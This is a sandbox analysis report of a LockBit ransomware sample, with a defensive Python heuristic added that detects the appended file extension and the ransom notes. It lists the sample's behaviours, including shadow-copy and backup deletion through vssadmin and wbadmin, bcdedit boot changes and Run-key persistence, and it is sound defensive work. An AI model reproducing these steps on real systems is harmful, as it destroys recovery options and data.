Malware Analysis Report

2024-11-30 11:30

Sample ID 240229-jxc45aba3y
Target file.None.0xfffffa801c116990.mal.exe.img
SHA256 5988e75518b2f365671dc49da18b5a70274351721f1f3a8f8f7bf32984e4024c
Tags
lockbit evasion persistence ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5988e75518b2f365671dc49da18b5a70274351721f1f3a8f8f7bf32984e4024c

Threat Level: Known bad

The file file.None.0xfffffa801c116990.mal.exe.img was found to be: Known bad.

Malicious Activity Summary

lockbit evasion persistence ransomware

Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Lockbit

Detects executables containing anti-forensic artifacts of deleting USN change journal. Observed in ransomware

Modifies boot configuration data using bcdedit

Renames multiple (9371) files with added filename extension

Renames multiple (14166) files with added filename extension

Deletes shadow copies

Deletes backup catalog

Deletes itself

Checks computer location settings

Enumerates connected drives

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Sets desktop wallpaper using registry

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Modifies Control Panel

Checks SCSI registry key(s)

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-29 08:02

Signatures

Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Static match on the file's contents only: no cmstp.exe activity or CMSTP COM usage is reported in the behavioral1 run below, so treat this as a capability indicator rather than observed behaviour.

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables containing anti-forensic artifacts of deleting USN change journal. Observed in ransomware

Static string match only: in the behavioral1 run below, fsutil is invoked with setZeroData against the sample's own image, not with usn deletejournal.

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-29 08:02

Reported

2024-02-29 08:05

Platform

win7-20240220-en

Max time kernel

118s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (9371) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\file.None.0xfffffa801c116990.mal.exe\"" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5071.tmp.bmp" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
(the row above is repeated 64 times in the original table, one per call from the sample process; the repeats are collapsed here)

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\js\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00703L.GIF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGTEAR.DPV.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\fr-FR\wmplayer.exe.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\wmlaunch.exe.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\settings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Grand_Turk.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0153089.WMF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL092.XML.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\de-DE\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01747_.GIF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_bottom.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00103_.GIF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSCOL11.INF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Asia\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\Windows Sidebar\es-ES\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\flyout.css.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_over.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Juan.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL109.XML.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Paramaribo.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_m.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152696.WMF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14844_.GIF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SlateBlue.css.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\js\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\POWERPNT.DEV.HXS.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\CHICAGO.XSL.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\js\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00224_.WMF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\localizedStrings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\defaults\pref\autoconfig.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_snow.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198234.WMF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_dot.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\RSSFeeds.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hovd.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00602_.WMF.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
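
Added triage logic (not part of the sandbox report) that recovers the appended extension and the ransom-note name from a stream of file events like the rows above, instead of relying on a hard-coded "lockbit" signature. The heuristic: a ransomware extension is the final suffix shared by many files whose previous suffix varies widely (.gif, .xml, .js ...), whereas a legitimate extension mostly sits on files with no previous suffix; a ransom note is the one file name created once per directory across many directories. The sample events are constructed from rows in this report plus the wallpaper .bmp from the registry indicator; the (operation, path) schema and the thresholds are assumptions.

```python
"""Recover ransomware file-rename and ransom-note artefacts from file events.
Added example; the event schema and thresholds are assumptions, the paths are
taken from the sandbox report's own rows."""
from __future__ import annotations

from collections import Counter, defaultdict
from pathlib import PureWindowsPath


def _suffixes(path: str) -> list[str]:
    # PureWindowsPath handles drive letters, spaces and parentheses in folder names.
    return [s.lower() for s in PureWindowsPath(path).suffixes]


def find_appended_extension(paths, min_files: int = 5, min_distinct_originals: int = 3):
    """Return (extension, file_count, set_of_original_extensions) for the final suffix
    that was appended on top of at least min_distinct_originals different original
    suffixes; ('' counts as "had no extension").  (None, 0, set()) if nothing qualifies."""
    files = Counter()
    originals: dict[str, set[str]] = defaultdict(set)
    for p in paths:
        sfx = _suffixes(p)
        if not sfx:
            continue
        candidate = sfx[-1]
        files[candidate] += 1
        originals[candidate].add(sfx[-2] if len(sfx) > 1 else "")
    for candidate, n in files.most_common():
        if n >= min_files and len(originals[candidate]) >= min_distinct_originals:
            return candidate, n, originals[candidate]
    return None, 0, set()


def find_ransom_note(created_paths, min_dirs: int = 3):
    """Return (name, directory_count) for the created file name seen in the most
    distinct directories, if that count reaches min_dirs; otherwise (None, 0)."""
    dirs: dict[str, set[str]] = defaultdict(set)
    for p in created_paths:
        wp = PureWindowsPath(p)
        dirs[wp.name].add(str(wp.parent).lower())
    if not dirs:
        return None, 0
    name, where = max(dirs.items(), key=lambda kv: len(kv[1]))
    return (name, len(where)) if len(where) >= min_dirs else (None, 0)


def triage_file_events(events, min_files=5, min_distinct_originals=3, min_note_dirs=3):
    """events: iterable of (operation, path), operation in {'created', 'modified'}."""
    all_paths = [p for _, p in events]
    created = [p for op, p in events if op == "created"]
    ext, n, originals = find_appended_extension(all_paths, min_files, min_distinct_originals)
    note, note_dirs = find_ransom_note(created, min_note_dirs)
    return {
        "appended_extension": ext,
        "renamed_files": n,
        "original_extensions": originals,
        "ransom_note": note,
        "note_directories": note_dirs,
    }


# Constructed sample: rows copied from the report, plus the wallpaper bitmap the sample
# wrote to %TEMP% (a legitimate "x.tmp.bmp" that must NOT be mistaken for an appended extension).
REPORT_FILE_EVENTS = [
    ("modified", r"C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk.lockbit"),
    ("modified", r"C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00703L.GIF.lockbit"),
    ("modified", r"C:\Program Files (x86)\Windows Media Player\fr-FR\wmplayer.exe.mui.lockbit"),
    ("modified", r"C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL092.XML.lockbit"),
    ("modified", r"C:\Program Files\Mozilla Firefox\defaults\pref\autoconfig.js.lockbit"),
    ("modified", r"C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_bottom.png.lockbit"),
    ("modified", r"C:\Users\Admin\AppData\Local\Temp\5071.tmp.bmp"),
    ("created", r"C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\js\Restore-My-Files.txt"),
    ("created", r"C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Restore-My-Files.txt"),
    ("created", r"C:\Program Files (x86)\Windows Sidebar\de-DE\Restore-My-Files.txt"),
    ("created", r"C:\Program Files (x86)\Microsoft Office\Office14\Restore-My-Files.txt"),
]

if __name__ == "__main__":
    print(triage_file_events(REPORT_FILE_EVENTS))
```

On a full capture the thresholds should be raised (the report counts 9371 and 14166 renamed files); the distinct-original-extension criterion is what keeps a mass drop of identical .txt notes, or a build that emits thousands of .obj files, from being reported as an encryption extension.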

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Desktop\WallpaperStyle = "2" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Desktop\TileWallpaper = "0" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\System32\cmd.exe
PID 2856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\System32\cmd.exe
PID 2856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\System32\cmd.exe
PID 2856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\System32\cmd.exe
PID 2956 wrote to memory of 1988 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2956 wrote to memory of 1988 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2956 wrote to memory of 1988 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2956 wrote to memory of 1412 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2956 wrote to memory of 1412 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2956 wrote to memory of 1412 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2956 wrote to memory of 2424 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2956 wrote to memory of 2424 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2956 wrote to memory of 2424 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2956 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2956 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2956 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2956 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2956 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2956 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2856 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 776 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 776 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 776 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
